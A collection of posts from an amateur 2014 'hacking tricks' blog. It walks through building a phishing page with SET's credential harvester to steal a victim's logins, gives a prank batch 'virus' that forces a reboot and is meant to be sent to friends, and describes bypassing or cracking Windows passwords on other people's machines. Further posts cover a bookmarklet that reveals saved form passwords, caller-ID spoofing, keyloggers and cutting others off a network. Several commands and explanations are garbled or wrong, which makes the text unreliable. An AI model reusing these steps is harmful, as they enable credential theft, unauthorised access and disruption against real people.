Sunday, September 14, 2014

MAKE OUR PRIVATE FOLDER

HOW TO MAKE OUR PRIVATE FOLDER
Hello guys today's i will show you how to make your folder private so that no one is able to access your private data.
The method of making the folder is very simple just follow these steps
1: Open the cmd 
2: Write cd desktop 


3: Type md name of your folder and press enter.
4: Write Cacls foldername  /E /P everyone:n  and press enter.
5: Your folder is locked and nobody is able to access it.
6: To access that folder write Cacls folder /E /P everyone:f







Wednesday, September 3, 2014

PHISHING ATTACK

PHISHING ATTACK
WHAT IS PHISHING ATTACK AND HOW TO CREATE PHISHING PAGE ?

Phishing is the process of stealing sensitive information , such as username ,password by pretending to be someone you are not.
Example:-
(Today's i will create a phishing page with the help of backtrack 5
if you want you learn the basic of backtrack 5 go to videos on this blog)

We can create a phishing page of a website so that we could easily know the username & password of the victim.
1:Open backtrack.
2:Go to the following address
Application->backtrack->exploiting tools->social engg tools->social engg tool kit->set
3:Select option website attack vector
Then select credential harvester method
4:Then choose site cloner
5:Then write the URL of the website you want to create phishing page correctly.
Click on * showing that you have read that option.
6:Send your IP to the victim.
When he use to enter the username & password ,it will come to you.
7:In this way you can easily hack the username & password of the victim.



Sunday, August 31, 2014

FACEBOOK VIRUS

FACEBOOK VIRUS 
HELLO EVERYONE TODAY's I WILL SHOW YOU A TRICK WHOSE NAME IS FACEBOOK VIRUS I WISH MOST OF YOU LIKE THIS TRICK
THE TRICK IS VERY SIMPLE AND EASY

TRICK IS TO MAKE YOUR FRIENDS FOOL BY THIS TRICK
JUST COPY THIS CODE INTO YOUR NOTEPAD AND SAVE IT WITH FACEBOOK CRACKER,BAT
@echo off msg* WARNING DELETED!!!!!
AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED!!!!
TO REMOVE THIS VIRUS CLICK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c --SORRY!!!!
YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED!!!!PLEASE WAIT......"
THIS WILL SHUTDOWN THERE COMPUTER AND DISPLAY A MESSAGE THAT HIS FACEBOOK ACCOUNT IS BLOCKED 
SEND IT TO YOUR FRIENDS
AND MAKE YOUR FRIEND FOOL WITH THIS
THANKS EVERYONE

Monday, August 25, 2014

CRACK WINDOWS PASSWORD WITHOUT ANY SOFTWARE

TODAY'S TOPIC:CRACK WINDOWS PASSWORD WITHOUT ANY SOFTWARE



HELLO GUYS TODAY I WILL SHOW YOU HOW TO CRACK THE WINDOWS PASSWORD WITHOUT ANY SOFTWARE JUST FOLLOW THE STEPS
1:OPEN THE C DRIVE GO TO FOLDER WINOWS/SYSYTEM32/CMD.EXE
2:COPY THE CMD.EXE TO DESKTOP
3:RENAME THE CMD.EXE TO SETCH.EXE AND PASTE IT TO BACK ON THAT FOLDER
4:IF ANY MESSAGE SHOW ALLOY IT 
5:SHUTDOWN THE COMPUTER AND START IT AND PRESS 5 TIMES SHIFT WHEN WINDOWS IS STARTING 
6:AFTER THAT CMD WILL BE OPEN WRITE THE FOLLOWING COMMAND IN IT
7:"NET USER ADMINISTRATOR PASSWORD "
8:PASSWORD OF THE ADMIN WILL BE SHOWN YOU

Wednesday, August 13, 2014

CRYPTOGRAPHY & STEGANOGRAPHY

Cryptography & steganography
Cryptography is a method or a process of protecting information by
transforming it or encrypting it to an unreadable format
Steganography is defined as the art of hiding the secret message /information
by embedding message within other such as images ,videos ,songs etc.
THERE ARE SOME TOOL FOR STEGANOGRAPHY 
1:Mozaiq
2:Jphide & jpseek
3:Steghide
4:stegomagic
You can download these software from the internet all these software are freely
available to download.
Download this software and install it and work on it in order to learn more about
the CRYPTOGRAPHY & STEGANOGRAPHY.
The more you work on these tools the more you able to prefect in this field and
this is the best method to encrypt your data or secure your data to be public.






Tuesday, August 5, 2014

HOW TO FIND HIDDEN PASSWORD BEHIND THE *********

HOW TO FIND HIDDEN PASSWORD BEHIND THE *********
1:FIRST GO TO THE WEBSITE WHERE PASSWORD ARE SAVED IN THE FORM OF *******

2:COPY THE FOLLOWING JAVA CODE IN THE ADDRESS BAR AND PRESS ENTER

 javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Passwords%20in%20forms%20on%20this
%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();

3:THE PASSWORD WILL SHOW YOU WHEN YOU PRESS ENTER


Saturday, August 2, 2014

HACK WPA /WEP WIFI PASSWORD

In This Tutorial We Will learn to hack/crack the WEP (Wired Equipped Privacy).  



A WEP key is a security code used on some Wi-Fi networks. WEP keys allow a group of devices on a local network (such as a home network) to exchange encoded messages with each other while hiding the contents of the messages from easy viewing by outsiders.

A WEP key is a sequence of hexadecimal digits. These digits include the numbers 0-9 and the letters A-F. Some examples of WEP keys are:
 1A648C9FE2  99D767BAC38EA23B0C0176D15

WEP keys are chosen by a network administrator. WEP keys are set on Wi-Fi routers, adapters and other wireless network devices. Matching WEP keys must be set on each device for them to communicate with each other. The length of a WEP key depends on the type of WEP security (called "encryption") utilized:
 40- / 64-bit WEP: 10 digit key  104- / 128-bit WEP: 26 digit key

To assist with the process of creating correct WEP keys, some brands of wireless network equipment automatically generates WEP keys from ordinary text called a pass phrase.

Air crack is an 802.11(protocol) WEP and WPA-PSK keys cracking application that is able to recover keys once enough data packets have been captured(Sniffed). It follows the standard FMS attack along with some optimizations like KoreK attacks, along with the all-new PTW attack, thus making the attack much faster and effective compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks and not much known by the crackers.

http://www.2shared.com/file/Y1QN63w-/AiroWizard_Setup-Beta_1-rev250.html

Friday, August 1, 2014

PENDRIVE BOOTABLE

         TODAY'S TOPIC:-PENDRIVE BOOTABLE
Today i will show you how to boot the pendrive with the help of the softwares and i will provide you links of some softwares you can download that software and boot your pendrive 
In future if you have any  problem occur regrading these software then you can ask me on my google account or you can comment ..


Thursday, July 31, 2014

WINDOWS HACKING

          TODAY'S TOPIC :-WINDOWS HACKING
 Windows being very popular has a lot of programs available which can be used to hack the login password. One of the most successful programs is Ophcrack, and it is free. Ophcrack is based on Slack ware, and uses rainbow tables to solve passwords up to 14 characters in length. The time required to solve a password? Generally 10 seconds. The expertise needed? None. 
Simply download the Ophcrack ISO and burn it to a CD (or load it onto a USB drive via UNetbootin). Insert the CD into a machine you would like to gain access to, then press and hold the power button until the computer shuts down. Turn the computer back on and enter BIOS at startup. Change the boot sequence to CD before HDD, then save and exit. 
The computer will restart and Ophcrack will be loaded. Sit back and watch as it does all the work for your. Write down the password it gives you, remove the disc, restart the computer, and log in as if it were you own machine. 
You can download OphCrack from the following link: 

http://ophcrack.sourceforge.net  

There is another hack possible with the same technique using a CD named "Hiren Boot CD" for hacking Windows password. 
You can download OphCrack from the following link: 

http://ophcrack.sourceforge.net


Wednesday, July 30, 2014

VOICE/CALL SPOFFING

            TODAY'S TOPIC IS:- VOICE/CALL SPOFFING



THERE ARE SOME LINKS OF CALLER SPOOFING YOU CAN GO TO THESE LINKS AND SPOOF YOU CALLING
Bascially what is happens in this software or site is spoof you number and connect you  with your victim for more detain in this topic wait for the next post or you can go to wikipedia
     3:bluffmycall
     4:webcrawler



Sunday, July 27, 2014

KEYLOGGERS

   HELLO FRNDS TODAY TOPIC:  KEYLOGGERS
ALL OF YOU BASIC KNOWS THE KEYLOGGER BUT MANY OF YOU DON'T KNOW WHAT IS EXACTLY KEYLOGGER IS AND FUNTION IT IS PERFORMED
SO THAT'S WHY TODAY I WILL DICUSS ON IT
     

There are some common keyloggers are :-
1:friend keylogger
2:kidlogger
3:spyrix keylogger
4:actual keylogger
5:G3isam
you can download these from internet these all are easily available on internet 

Friday, July 25, 2014

C++ PROGRAMS

      How to make a program in c++  to shutdown the system


step:1  copy this code in your notepad and save it 

 #include<iostream.h>
#include<conio.h>
#include<stdlib.h>
void main()
{
system("cd://windows//system32//shutdown -s")
getch();}

                                       step:3 copy the saved file and paste it on your turboc++/devc++    
or
you can direct wirte this code in turbo c++


In this way you can make virus In the next post i will show you 
how to make virus


                                                     
                                                                                                                    


Tuesday, July 22, 2014

ADVANCE PORT SCANNER

                   TODAY'S TOPIC :-ADVANCE PORT SCANNER


                                                                download

THIS PORT SCANNER IS BASICALLY SCAN THE NUMBER OF PORTS THAT ARE OPENED IN YOUR NETWORK AND IN THIS YOU CAN CHECK THAT ANY VIRUS IN YOUR PC
THAT WILL DAMAGE T YOUR PC
THERE NO OF PORTS FOR VIRUS YOU CAN CHECK AS YOURSELF THROUGH GOOGLE

Monday, July 21, 2014

NETCUT

HELLO FRIENDS:-
                                         TODAY TOPIC IS NETCUT
                                     
                                   

This tool is basically cut the connection that are attached to your network and increase the speed of your computer 
The more you cut the connection the more speed you can gain
So guys simply select the network and click on cut in this tool
I hope you will enjoy this tool



Sunday, July 20, 2014

HELLO FRIENDS  WELCOME TO OUR BLOG IN THIS BLOG THERE ARE LOT OF TRICKS 
I WILL SHOW YOU 
ON THE BASIS OF HACKING ,SECURITY.....ETC
 THIS IS OUR FACEBOOK PAGE 
GO AND LIKE FAST

VIRUS,WORM AND TROJAN

VIRUS , WORMS AND TROJAN :-  A virus is a program that will run background of the system .Virus can be damage your computer and corrupt yo...